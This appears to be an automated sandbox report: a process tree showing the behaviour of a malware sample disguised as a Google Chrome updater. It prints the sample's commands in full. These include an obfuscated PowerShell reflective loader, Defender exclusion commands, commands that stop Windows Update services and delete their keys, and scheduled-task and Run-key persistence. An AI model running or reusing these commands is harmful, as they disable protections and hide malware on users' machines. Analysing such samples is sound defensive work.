    C:\Windows\system32\dialer.exe  (depth 3)
      command line: C:\Windows\system32\dialer.exe
      - Drops file in Windows directory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 3)
      command line: powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      C:\Windows\system32\schtasks.exe  (depth 4)
        command line: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe  (depth 1)
  command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe  (depth 2)
    command line: C:\Windows\system32\WerFault.exe -u -p 3516 -s 148
    - Program crash
    - Checks processor information in registry
C:\Windows\System32\RuntimeBroker.exe  (depth 1)
  command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Suspicious use of UnmapMainImage
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe  (depth 1)
  command line: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\System32\RuntimeBroker.exe  (depth 1)
  command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Modifies registry class
C:\Windows\System32\svchost.exe  (depth 1)
  command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\spoolsv.exe  (depth 1)
  command line: C:\Windows\System32\spoolsv.exe
C:\Windows\system32\DllHost.exe  (depth 1)
  command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe  (depth 2)
    command line: C:\Windows\system32\WerFault.exe -u -p 4456 -s 356
    - Program crash
    - Checks processor information in registry
C:\Windows\System32\svchost.exe  (depth 1)
  command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\svchost.exe  (depth 1)
  command line: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\System32\svchost.exe  (depth 1)
  command line: C:\Windows\System32\svchost.exe -k netsvcs -p
C:\Windows\System32\RuntimeBroker.exe  (depth 1)
  command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
  - Suspicious use of UnmapMainImage
C:\Windows\System32\svchost.exe  (depth 1)
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe  (depth 1)
  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe  (depth 1)
  command line: C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe  (depth 1)
  command line: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe  (depth 1)
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k LocalService -s W32Time
C:\Windows\System32\RuntimeBroker.exe  (depth 1)
  command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\backgroundTaskHost.exe  (depth 1)
  command line: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca
C:\Windows\System32\svchost.exe  (depth 1)
  command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe  (depth 1)
  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe  (depth 1)
  command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe  (depth 1)
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  - Drops file in System32 directory
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe  (depth 1)
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  - Drops file in System32 directory
  - Drops file in Windows directory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  (depth 2)
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE  (depth 2)
    command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    C:\Windows\System32\Conhost.exe  (depth 3)
      command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  C:\Program Files\Google\Chrome\updater.exe  (depth 2)
    command line: "C:\Program Files\Google\Chrome\updater.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 3)
      command line: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\system32\cmd.exe  (depth 3)
      command line: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop UsoSvc
        - Launches sc.exe
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop WaaSMedicSvc
        - Launches sc.exe
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop wuauserv
        - Launches sc.exe
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop bits
        - Launches sc.exe
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop dosvc
        - Launches sc.exe
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    C:\Windows\system32\cmd.exe  (depth 3)
      command line: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -hibernate-timeout-ac 0
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -hibernate-timeout-dc 0
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -standby-timeout-ac 0
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -standby-timeout-dc 0
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 3)
      command line: powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\system32\dialer.exe  (depth 3)
      command line: C:\Windows\system32\dialer.exe xtrjicqmdliu
      C:\Windows\system32\cmd.exe  (depth 4)
        command line: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        - Drops file in Program Files directory
        C:\Windows\System32\Conhost.exe  (depth 5)
          command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\system32\cmd.exe  (depth 3)
      command line: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      - Drops file in Program Files directory
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      C:\Windows\System32\Wbem\WMIC.exe  (depth 4)
        command line: wmic PATH Win32_VideoController GET Name, VideoProcessor
        - Detects videocard installed
    C:\Windows\system32\dialer.exe  (depth 3)
      command line: C:\Windows\system32\dialer.exe wvhbfinhdckusjju
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE  (depth 2)
    command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    C:\Windows\System32\Conhost.exe  (depth 3)
      command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      - Suspicious use of SetWindowsHookEx
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  (depth 2)
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    C:\Windows\System32\Conhost.exe  (depth 3)
      command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      - Checks processor information in registry
  C:\Program Files\Google\Chrome\updater.exe  (depth 2)
    command line: "C:\Program Files\Google\Chrome\updater.exe"
    - Executes dropped EXE
    - Drops file in Program Files directory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 3)
      command line: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\system32\cmd.exe  (depth 3)
      command line: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop UsoSvc
        - Launches sc.exe
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop WaaSMedicSvc
        - Launches sc.exe
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop wuauserv
        - Launches sc.exe
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop bits
        - Launches sc.exe
      C:\Windows\system32\sc.exe  (depth 4)
        command line: sc stop dosvc
        - Launches sc.exe
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
      C:\Windows\system32\reg.exe  (depth 4)
        command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    C:\Windows\system32\cmd.exe  (depth 3)
      command line: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - Checks computer location settings
      - Checks system information in the registry
      - Enumerates system info in registry
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -hibernate-timeout-ac 0
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -hibernate-timeout-dc 0
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -standby-timeout-ac 0
      C:\Windows\system32\powercfg.exe  (depth 4)
        command line: powercfg /x -standby-timeout-dc 0
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (depth 3)
      command line: powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\system32\cmd.exe  (depth 3)
      command line: cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      - Drops file in Program Files directory
      C:\Windows\System32\Conhost.exe  (depth 4)
        command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      C:\Windows\System32\Wbem\WMIC.exe  (depth 4)
        command line: wmic PATH Win32_VideoController GET Name, VideoProcessor
        - Detects videocard installed
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE  (depth 2)
    command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    C:\Windows\System32\Conhost.exe  (depth 3)
      command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      - Suspicious use of SetWindowsHookEx
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  (depth 2)
    command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 424 -p 3516 -ip 35162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 464 -p 4456 -ip 44562⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 4256 -ip 42562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 448 -p 3828 -ip 38282⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 1372 -ip 13722⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 3980 -ip 39802⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 384 -p 4700 -ip 47002⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 1232 -ip 12322⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 4228 -ip 42282⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 592 -p 3596 -ip 35962⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 4120 -ip 41202⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 4948 -ip 49482⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 4856 -ip 48562⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 3372 -ip 33722⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 4944 -ip 49442⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 560 -p 4716 -ip 47162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 636 -ip 6362⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 384 -p 3408 -ip 34082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 3028 -ip 30282⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 560 -p 1708 -ip 17082⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 4480 -ip 44802⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 5012 -ip 50122⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 3652 -ip 36522⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 4780 -ip 47802⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 4564 -ip 45642⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 612 -p 2588 -ip 25882⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 552 -p 2276 -ip 22762⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 612 -p 2264 -ip 22642⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 592 -p 772 -ip 7722⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 536 -p 432 -ip 4322⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 584 -p 2016 -ip 20162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 5116 -ip 51162⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 616 -p 2632 -ip 26322⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 5004 -ip 50042⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 4792 -ip 47922⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 224 -ip 2242⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 588 -p 1528 -ip 15282⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 568 -p 3520 -ip 35202⤵
